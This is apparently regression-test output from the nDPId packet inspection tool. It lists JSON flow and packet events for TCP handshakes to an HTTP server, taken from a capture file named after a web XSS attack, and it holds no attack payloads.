-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347124454,"flow_last_seen":1499347129648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53866,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347124454,"flow_last_seen":1499347129648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347243333,"flow_last_seen":1499347243333,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347243333,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1499347243333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347243333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87MZAAD4G2QmsEAABwKgKMtdOAFA1pxnaAAAAAKACchBBjgAAAgQFtAQCCAoBOfUcAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2296,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":2,"flow_last_seen":1499347243333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347243333,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ104lyvYYNacZ26AScSBcFAAAAgQFtAQCCAoD48aSATn1HAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":3,"flow_last_seen":1499347243334,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347243334,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07MdAAD4G2RCsEAABwKgKMtdOAFA1pxnbJcr2GYAQAOX7GwAAAQEICgE59RwD48aS"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347244580,"flow_last_seen":1499347244580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347244580,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1499347244580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347244580,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UrJAAD4Gcx6sEAABwKgKMtdcAFCKtaTmAAAAAKACchBgLQAAAgQFtAQCCAoBOfZUAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":2,"flow_last_seen":1499347244580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347244580,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ11yGUuJUirWk56AScSAstwAAAgQFtAQCCAoD48fKATn2VAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2309,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":3,"flow_last_seen":1499347244581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347244581,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UrNAAD4GcyWsEAABwKgKMtdcAFCKtaTnhlLiVYAQAOXLvgAAAQEICgE59lQD48fK"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347247114,"flow_last_seen":1499347247114,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347247114,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1499347247114,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347247114,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GLNAAD4GrR2sEAABwKgKMtd2AFApn+B+AAAAAKACchCDGAAAAgQFtAQCCAoBOfjNAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":2,"flow_last_seen":1499347247114,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347247114,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ13ZCBl2jKZ\/gf6AScSAWJgAAAgQFtAQCCAoD48pEATn4zQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2330,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":3,"flow_last_seen":1499347247115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347247115,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GLRAAD4GrSSsEAABwKgKMtd2AFApn+B\/QgZdpIAQAOW1LAAAAQEICgE5+M4D48pE"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347248373,"flow_last_seen":1499347248373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347248373,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1499347248373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347248373,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JiRAAD4Gn6ysEAABwKgKMteEAFBjB9wsAAAAAKACchBMuQAAAgQFtAQCCAoBOfoIAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2338,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":2,"flow_last_seen":1499347248373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347248373,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ14RKuW9xYwfcLaAScSDECwAAAgQFtAQCCAoD48t+ATn6CAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2339,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":3,"flow_last_seen":1499347248374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347248374,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JiVAAD4Gn7OsEAABwKgKMteEAFBjB9wtSrlvcoAQAOVjEgAAAQEICgE5+gkD48t+"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347249651,"flow_last_seen":1499347249651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347249651,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55186,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1499347249651,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347249651,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ostAAD4GIwWsEAABwKgKMteSAFAC31mDAAAAAKACchAuPQAAAgQFtAQCCAoBOftIAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":2,"flow_last_seen":1499347249652,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347249652,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ15JGEK8pAt9ZhKAScSBpQAAAAgQFtAQCCAoD48y+ATn7SAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2351,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":3,"flow_last_seen":1499347249652,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347249652,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0osxAAD4GIwysEAABwKgKMteSAFAC31mERhCvKoAQAOUISAAAAQEICgE5+0gD48y+"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347252179,"flow_last_seen":1499347252179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252179,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1499347252179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347252179,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86Q5AAD4G3MGsEAABwKgKMtesAFDOJxTOAAAAAKACchClFwAAAgQFtAQCCAoBOf3AAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2368,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":2,"flow_last_seen":1499347252179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347252179,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ16ypaMjNzicUz6AScSBgpgAAAgQFtAQCCAoD4882ATn9wAEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2369,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":3,"flow_last_seen":1499347252180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347252180,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06Q9AAD4G3MisEAABwKgKMtesAFDOJxTPqWjIzoAQAOX\/rQAAAQEICgE5\/cAD4882"} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347125743,"flow_last_seen":1499347131649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53880,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347125743,"flow_last_seen":1499347131649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53880,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347128311,"flow_last_seen":1499347133649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53906,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347128311,"flow_last_seen":1499347133649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347129584,"flow_last_seen":1499347134649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53920,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347129584,"flow_last_seen":1499347134649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347132137,"flow_last_seen":1499347137650,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53946,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347132137,"flow_last_seen":1499347137650,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347133434,"flow_last_seen":1499347138651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53960,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347133434,"flow_last_seen":1499347138651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347253445,"flow_last_seen":1499347253445,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347253445,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55226,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1499347253445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347253445,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uoZAAD4GC0qsEAABwKgKMte6AFBXtER6AAAAAKACchDqlAAAAgQFtAQCCAoBOf78AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":2,"flow_last_seen":1499347253445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347253445,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ17p5Tes0V7REe6AScSCymwAAAgQFtAQCCAoD49ByATn+\/AEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2381,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":3,"flow_last_seen":1499347253445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347253445,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uodAAD4GC1GsEAABwKgKMte6AFBXtER7eU3rNYAQAOVRowAAAQEICgE5\/vwD49By"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2394,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347254714,"flow_last_seen":1499347254714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347254714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55240,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2394,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1499347254714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347254714,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8sPBAAD4GFOCsEAABwKgKMtfIAFAvObDJAAAAAKACchCldQAAAgQFtAQCCAoBOgA5AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2395,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":2,"flow_last_seen":1499347254714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347254714,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ18hpS4YpLzmwyqAScSDhSwAAAgQFtAQCCAoD49GwAToAOQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":3,"flow_last_seen":1499347254715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347254715,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0sPFAAD4GFOesEAABwKgKMtfIAFAvObDKaUuGKoAQAOWAUgAAAQEICgE6ADoD49Gw"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2410,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347257224,"flow_last_seen":1499347257224,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347257224,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2410,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1499347257224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347257224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MIRAAD4GlUysEAABwKgKMtfiAFCgDzIpAAAAAKACchCwsQAAAgQFtAQCCAoBOgKtAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2411,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":2,"flow_last_seen":1499347257224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347257224,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1+LmPUR7oA8yKqAScSCu0AAAAgQFtAQCCAoD49QjAToCrQEDAwc="} 